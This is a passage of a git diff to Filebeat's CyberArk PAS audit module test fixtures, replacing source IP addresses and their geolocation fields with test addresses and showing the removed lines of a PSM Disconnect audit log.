"source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", 
@@ -1406,23 +1304,18 @@ "cyberarkpas.audit.extra_details.protocol": "SSH", "cyberarkpas.audit.extra_details.psmid": "PSMServer", "cyberarkpas.audit.extra_details.session_id": "8b222ac9-c2ad-49ea-9c4e-6829940f58d4", - "cyberarkpas.audit.extra_details.src_host": "81.32.170.205", + "cyberarkpas.audit.extra_details.src_host": "67.43.156.14", "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", "cyberarkpas.audit.iso_timestamp": "2021-03-16T10:04:51Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "PSM Connect", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 16 03:04:51\n 2021-03-16T10:04:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 16 03:04:51\n 2021-03-16T10:04:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.2.69.143\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.14;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.safe": "partner", "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 16 03:04:51", "destination.address": "34.123.103.115", - "destination.geo.continent_name": "North America", - 
"destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "34.123.103.115", "destination.user.name": "testark", "event.action": "psm connect", @@ -1443,7 +1336,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 46310, + "log.offset": 46244, "log.syslog.priority": "5", "network.application": "ssh", "network.direction": "external", @@ -1453,24 +1346,21 @@ "observer.version": "11.7.0000", "related.ip": [ "34.123.103.115", - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "Administrator", "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "source.user.name": "Administrator", "tags": [ "cyberarkpas.audit", diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log b/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log index c172f644c9f3..6a66f8b7a52a 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/302_psm_disconnect.log 
@@ -1,16 +1,16 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"302","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:47:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:47:01\n 2021-03-11T17:47:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
09:47:01","IsoTimestamp":"2021-03-11T17:47:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:40\n 2021-03-11T17:48:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:40","IsoTimestamp":"2021-03-11T17:48:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:55:02Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:55:02\n 2021-03-11T17:55:02Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:55:02","IsoTimestamp":"2021-03-11T17:55:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM 
Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:42Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:42\n 2021-03-11T17:56:42Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:42","IsoTimestamp":"2021-03-11T17:56:42Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:30\n 2021-03-11T20:23:30Z\n 
VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:30","IsoTimestamp":"2021-03-11T20:23:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:54\n 2021-03-14T13:49:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\n PSM 
Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:54","IsoTimestamp":"2021-03-14T13:49:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:51:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:51:35\n 2021-03-14T13:51:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:51:35","IsoTimestamp":"2021-03-14T13:51:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. 
Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:30\n 2021-03-15T10:33:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:30","IsoTimestamp":"2021-03-15T10:33:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:34:50Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:34:50\n 2021-03-15T10:34:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:34:50","IsoTimestamp":"2021-03-15T10:34:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T11:12:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 04:12:09\n 2021-03-15T11:12:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n 
Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 04:12:09","IsoTimestamp":"2021-03-15T11:12:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T13:18:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:36\n 2021-03-15T13:18:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:36","IsoTimestamp":"2021-03-15T13:18:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=81.32.170.205;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:11\n 2021-03-15T14:08:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=81.32.170.205;User=adrian;\n PSM 